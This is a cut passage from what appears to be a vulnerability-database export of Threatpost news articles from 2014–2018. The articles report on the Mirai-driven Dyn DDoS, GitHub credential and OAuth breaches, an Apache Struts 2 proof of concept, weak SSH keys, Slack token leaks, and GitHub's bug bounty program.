attacker\u2019s SMB server was down when it analyzed samples, making it impossible to determine the payloads (if any) that could have been dropped by the template being downloaded. \u201cForcing SMB requests to an external server has been a known security vulnerability for many years. 
Without further information it is impossible to conclude what the true scope of this attack was or what malicious payloads could have been involved.\u201d\n\nAccording to a _[New York Times](<https://www.nytimes.com/2017/07/06/technology/nuclear-plant-hack-report.html>)_ report, attacks against Wolf Creek Nuclear Operating Corporation included phishing lures with highly targeted email messages containing fake resumes for control engineering jobs.\n\nLate last month, the U.S. government warned critical infrastructure companies of hacking campaigns against the nuclear and energy sectors. \u201cHistorically, cyber actors have strategically targeted the energy sector with various goals ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict,\u201d the report said.\n", "cvss3": {}, "published": "2017-07-10T14:34:03", "type": "threatpost", "title": "Energy, Nuclear Targeted with Template Injection Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-07-10T18:34:03", "id": "THREATPOST:6495B216452F8FF8CDF9A8F13AD41168", "href": "https://threatpost.com/energy-nuclear-targeted-with-template-injection-attacks/126727/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update** DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. 
EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. Gillian Christensen, acting deputy press secretary for DHS, said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21st-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nThe source of the DDoS attack is unclear at this time, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications, said he had been monitoring the attack and the likely source was overseas hackers targeting U.S. cyber infrastructure. 
He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Mirai.\u201d\n\nSecurity firm Flashpoint also identified Mirai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principal security researcher at Tripwire, said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms of IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. 
However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO Michael DeCesare said that attacks, such as the ones carried out Friday, are exacerbated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[Level3 live outage map on Friday 9:50 AM (EDT)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\n[Level3 live outage map on Friday 5:20 PM (EDT)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout._\n
", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": "THREATPOST:0FC293825070B81036932BDB41D793B5", "href": "https://threatpost.com/dyn-confirms-ddos-attack-affecting-twitter-github-many-others/121438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:10", "description": "Mike Mimoso and Chris Brook discuss the news of the week, including a password issue at Github, the xDedic marketplace, another Flash zero day, and how poorly the FBI is doing with facial recognition software.\n\nDownload: [Threatpost_News_Wrap_June_17_2016.mp3](<http://traffic.libsyn.com/digitalunderground/Threatpost_News_Wrap_June_17_2016.mp3>)\n\nMusic by Chris Gonsalves\n", "cvss3": {}, "published": "2016-06-17T11:15:12", "type": "threatpost", "title": "On xDedic, a Flash Zero Day, Facial Recognition, and More", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:31", "id": "THREATPOST:962241D6EFDC7F82640BA9171D82D0B7", "href": "https://threatpost.com/threatpost-news-wrap-june-17-2016/118745/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:11", "description": "Github is forcing a password reset on some of its users after it detected a number of successful intrusions into its repositories using credentials compromised in other breaches.\n\n\u201cThis appears to be the result of an attacker using lists of email addresses and passwords from other online services that have been compromised in the past, and trying them on GitHub accounts,\u201d GitHub said in an [advisory](<https://github.com/blog/2190-github-security-update-reused-password-attack>) published Thursday by Shawn Davenport, 
GitHub VP of security. \u201cWe immediately began investigating, and found that the attacker had been able to log in to a number of GitHub accounts.\u201d\n\nGitHub said it detected late Tuesday unauthorized attempts against a large number of GitHub accounts. It stressed that GitHub itself has not been compromised.\n\nIt warns users that in addition to the exposed credentials, some personal information may have been exposed as well as lists of accessible repositories and organizations.\n\n\u201cIf your account was impacted, we are in the process of contacting you directly with information about how to reset your password and restore access to your account,\u201d GitHub said.\n\nThe source of credentials used to attack GitHub accounts is unknown. ~~A request for comment from GitHub was not returned in time for publication~~ Github declined to comment beyond what is in its advisory.\n\nIn recent weeks, a number of massive online services including Twitter, VerticalScope, LinkedIn, Tumblr, VK.com and others have been informed that login credentials are for sale in bulk on the black market.\n\nAggregator site LeakedSource has been selling access to its database of breached credentials and more than 700 million credentials have been shared with the site.\n\n\u201cOur intentions are to bring data breaches to light no matter how old, inform consumers about what data is out there, inform consumers to use unique passwords and through our business API directly help companies determine if their users are at risk for account hijacking,\u201d LeakedSource told Threatpost.\n\n[VerticalScope](<http://www.verticalscope.com/about-us/security-update.html>), whose technology powers a number of popular online forums, is the most recent victim to come to light. 
More than 40 million credentials are believed to be implicated, stolen from sites running outdated vBulletin software that fails to implement HTTPS.\n\n\u201cWe believe that any potential breach is limited to usernames, userids, email addresses, ip addresses and encrypted passwords of our community users,\u201d VerticalScope said in its advisory.\n\nThe VerticalScope data was shared with LeakedSource, which analyzed it and said most of the passwords were salted and hashed with the outdated MD5 algorithm and easily crackable. LeakedSource published a top 10 list of the most common passwords, and an unusual number of gibberish, complex passwords were included (18atcskd2w was used on more than 91,000 accounts), indicating that they were likely generated by a bot and used to access the various forums.\n\nIn addition to VerticalScope, LeakedSource has analyzed tens of millions of credentials belonging to Twitter, iMesh and users of other large services whose credentials were stolen at some point.\n\nExperts, meanwhile, continue to caution against [password reuse](<https://threatpost.com/no-simple-fix-for-password-reuse/118536/>). As these breaches show, using the same password to access multiple sites is becoming fodder for attackers compromising one site to use that same access at other locations on the Internet.\n\n\u201cWe know that attackers will go for the weakest link and that is any user who reuses their passwords. 
It\u2019s a major problem,\u201d said Christopher Hadnagy, chief human hacker at security firm Social-Engineer.\n", "cvss3": {}, "published": "2016-06-17T11:01:55", "type": "threatpost", "title": "Breached Credentials Used to Access Github Repositories", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-06-28T13:58:36", "id": "THREATPOST:375A1BFC29F5B279C4D5E461D79CE4AA", "href": "https://threatpost.com/breached-credentials-used-to-access-github-repositories/118746/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:23", "description": "A Russian security researcher was able to take five low severity OAuth bugs in the coding site Github and string them together to create what he calls a \u201csimple but high severity exploit\u201d that gave him unfettered access to users\u2019 private repositories.\n\nBangkok-based researcher Egor Homakov \u2013 inspired to poke around the site after learning about its [new bug bounty program last month](<http://threatpost.com/github-launches-bug-bounty-program/103974>) \u2013 discussed the bugs in a blog entry [on his site](<http://homakov.blogspot.com/2014/02/how-i-hacked-github-again.html?m=1>) on Friday.\n\nGithub went on to fix the vulnerabilities \u201cin a timely fashion\u201d according to Homakov, who said he received a $4,000 reward, the highest Github has rewarded in the bounty program\u2019s short time, for his work.\n\nThe main problem lies in the site\u2019s Gist OAuth functionality. 
[Gists](<https://gist.github.com/>) are Pastebin-like repositories on Github that allow coders to share bits and pieces of their work with their contemporaries, and OAuth is an authentication protocol that can allow different entities, be it a web app or a mobile app, varying degrees of access to your account.\n\nThe first vulnerability Homakov noticed in Github was that he could bypass its [redirect_uri](<https://developer.github.com/v3/oauth/#redirect-urls>) validation by inputting a /../ path traversal. A path traversal attack allows files and directories stored outside the web root folder to be accessed by manipulating the URL. In this case, when the browser is redirected, Homakov found that he can control the HTTP parameter and trick it into not fully parsing the URL, letting him redirect to any Gist page he wants.\n\nIn fact Homakov found that whatever the client sent to get an authorization token, the provider would respond with a valid access_token, a vulnerability that could be used to compromise the log-in functionality on any site that uses it.\n\nThis \u2013 the second bug \u2013 could make it easy for an attacker to hijack the authorization code used for the redirect_uri and simply apply the leaked code on the real client\u2019s callback to log in under the victim\u2019s account.\n\nHomakov discovered he could leverage both bugs to trick a user into following a link to get Github to leak a code sending request to him. Using something he\u2019s nicknamed an [Evolution of Open Redirect vulnerability](<http://homakov.blogspot.com/2014/01/evolution-of-open-redirect-vulnerability.html>), the code sending request is sent to an image request, which Homakov can then use to log into the victim\u2019s account and secure access to private gists.\n\nGists are static pages and can even allow users to embed their own images, or at least image code. 
In this situation there\u2019s a certain way the code can point to a suspicious URL and acquire the victim\u2019s code.\n\nOnce in, Homakov found that the client reveals the victim\u2019s actual OAuth access_token to the user agent, something he then was able to take advantage of and use to perform API calls on behalf of the victim.\n\nSince Gist falls under the Github umbrella, Homakov found the client approves any scope it\u2019s asked automatically. That includes allowing it to carry out specially crafted URLs that can leak code, giving him access to private GitHub repositories and Gists, \u201call in stealth-mode,\u201d because the github_token belongs to the Gist client. From here Homakov has the control of the affected Github user and their Gist account.\n\nHomakov is no stranger to rooting out Github bugs; he blogged about a bug involving the way the site pushes [public keys](<http://homakov.blogspot.com/2012/03/how-to.html>) in March 2012 and a problem with the way the site [handles cookies](<http://homakov.blogspot.com/2013/03/hacking-github-with-webkit.html>) last March.\n\nGithub kicked off its bug bounty program just over a week ago by promising to award anywhere from $100 to $5,000 to researchers who discover vulnerabilities in the site or other applications like its API or Gist. 
As Homakov\u2019s vulnerability involved both Github and Gist and fetched $4,000, it was clearly of concern to the site, with the way the vulnerabilities \u201c[fit so nicely together](<https://twitter.com/homakov/status/431685133570031617>),\u201d impressing Github.\n", "cvss3": {}, "published": "2014-02-11T10:53:58", "type": "threatpost", "title": "Five OAuth Bugs Lead to Github Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-02-13T22:01:16", "id": "THREATPOST:1F0994F898084346360FB7C6EFEC201C", "href": "https://threatpost.com/five-oauth-bugs-lead-to-github-hack/104178/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:35", "description": "Proof-of-concept code found on the GitHub repository could allow attackers to easily take advantage of a recently identified vulnerability in the Apache Struts 2 framework. The vulnerability ([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. 
The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. 
We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. 
Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processor by today\u2019s standards), and then a few more minutes to transform those back into an SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on an i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. 
The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and it\u2019s designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. 
By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plug a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs, which discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and 
data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. 
Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its position on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seek out tokens it believed companies did not want to share intentionally, and deactivate them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. 
Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Almost a year to the day since [Github announced its bug bounty program](<http://threatpost.com/github-launches-bug-bounty-program/103974>), the Git repository said yesterday that it will double its maximum payout to $10,000.\n\nBen Toews, a GitHub staffer, said yesterday that since the launch of the GitHub Security Bug Bounty, 73 previously unknown vulnerabilities have been patched.\n\n\u201cOf 1,920 submissions in the past year, 869 warranted further review, helping us to identify and fix vulnerabilities fitting nine of the OWASP top 10 vulnerability classifications,\u201d Toews said in a post to the GitHub blog. He added that GitHub has paid out $50,100 in bounties to 33 different researchers reporting 57 medium- to high-risk security issues.\n\n\u201cWe saw some incredibly involved and creative vulnerabilities reported,\u201d Toews said.\n\nGitHub pays bounties for verifiable bugs in the GitHub API, GitHub Gist, and the GitHub.com website. Until yesterday, rewards ranged from $100 to $5,000 in each [open bounty](<https://bounty.github.com/index.html#open-bounties>). The API, for example, exposes a lot of the website\u2019s functionality and data so it was a priority. The Gist is a GitHub code-sharing product built on Ruby on Rails and other open source components; bounties here vary depending on certain factors, GitHub said. 
As for the website, bounties there too depend on different factors and risks.\n\nBug bounties are an efficient and economical way for under-resourced organizations to expose applications to researchers who can help identify and fix potentially critical security vulnerabilities. Larger organizations such as [Facebook have prominent in-house bounties](<http://threatpost.com/facebook-bug-bounty-submissions-dramatically-increase/105235>). Facebook\u2019s, for example, paid out $1.5 million in 2013 with submissions growing almost 250 percent year over year.\n\nOthers are taking advantage of [bug bounty platforms offered by providers](<http://threatpost.com/crowdsourcing-finding-its-security-sweet-spot/106848>) such as BugCrowd and HackerOne. In these cases, providers essentially crowdsource vulnerability discovery and management. A self-contained community hammers away at applications on these respective platforms and earn bounties for bugs that meet certain criteria.\n\n> Git Hub will double its maximum bug bounty payout to $10,000\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgithub-doubles-down-on-maximum-bug-bounty-payouts%2F110730%2F&text=Git+Hub+will+double+its+maximum+bug+bounty+payout+to+%2410%2C000>)\n\nGitHub\u2019s Toews pointed out one of GitHub\u2019s top bug submitters, Aleksandr Dobkin, who found a troubling cross-site scripting flaw that when combined with a zero day in Google\u2019s Chrome browser achieved a bypass of GitHub\u2019s content security policy.\n\nGitHub maintains a [leaderboard](<https://bounty.github.com/index.html>) of its top bug hunters. The system requires that researchers who find vulnerabilities in a GitHub property not disclose it before a patch has been released and implemented. 
Researchers are also not allowed to use automated scanners against GitHub, or access another user\u2019s account as part of the program.\n\nToews said vulnerabilities can be submitted [here](<https://bounty.github.com/submit-a-vulnerability.html>), and should also be accompanied by proper documentation that will allow GitHub to reproduce the vulnerability.\n", "cvss3": {}, "published": "2015-01-29T11:21:40", "type": "threatpost", "title": "GitHub Doubles Maximum Bug Bounty Payouts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-30T20:11:49", "id": "THREATPOST:812C0E3D711FC77AF4348016C7A094D2", "href": "https://threatpost.com/github-doubles-down-on-maximum-bug-bounty-payouts/110730/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:19", "description": "The amount of insecure software tied to reused third-party libraries and lingering in applications long after patches have been deployed is staggering. It\u2019s a habitual problem perpetuated by developers failing to vet third-party code for vulnerabilities, and some repositories taking a hands-off approach with the code they host.\n\nThis scenario allows attackers to target one overlooked component flaw used in millions of applications instead of focusing on a single application security vulnerability. The real-world consequences have been demonstrated in the past few years with the [Heartbleed](<https://threatpost.com/openssl-fixes-tls-vulnerability/105300/>) vulnerability in OpenSSL, [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) in GNU Bash, and a deserialization vulnerability exploited in a recent high-profile attack against the [San Francisco Municipal Transportation Agency](<https://threatpost.com/hackers-make-new-claim-in-san-francisco-transit-ransomware-attack/122138/>). 
These are three instances where developers reuse libraries and frameworks that contain unpatched flaws in production applications.\n\nSecurity researchers at Veracode estimate that 97 percent of Java applications it tested included at least one component with at least one known software vulnerability. \u201cThe problem isn\u2019t limited to Java and isn\u2019t just tied to obscure projects,\u201d said Tim Jarrett, senior director of security at Veracode. \u201cPick your programming language.\u201d Gartner, meanwhile, estimates that by 2020, [99 percent of vulnerabilities](<http://www.gartner.com/smarterwithgartner/top-10-security-predictions-2016/>) exploited will be ones known by security and IT professionals for at least one year.\n\n**Code Reuse Saves Time, Invites Bugs**\n\nAccording to security experts, the problem is two-fold. On one hand, developers use reliable code that at a later date is found to have a vulnerability. Second, insecure code is used by a developer who doesn\u2019t exercise due diligence on the software libraries used in their project.\n\n\u201cThey\u2019ve heard the warnings and know the dangers, but for many developers open source and third-party components can be a double-edged sword \u2013 saving time but opening the door to bugs,\u201d said Derek Weeks, vice president and DevOps advocate at Sonatype.\n\nIn an analysis of 25,000 applications, Sonatype found that seven percent of components had at least one security defect tied to the use of an insecure software component.\n\nRepositories GitHub, Bitbucket, Python Package Index and NuGet Gallery are essential tools helping developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. 
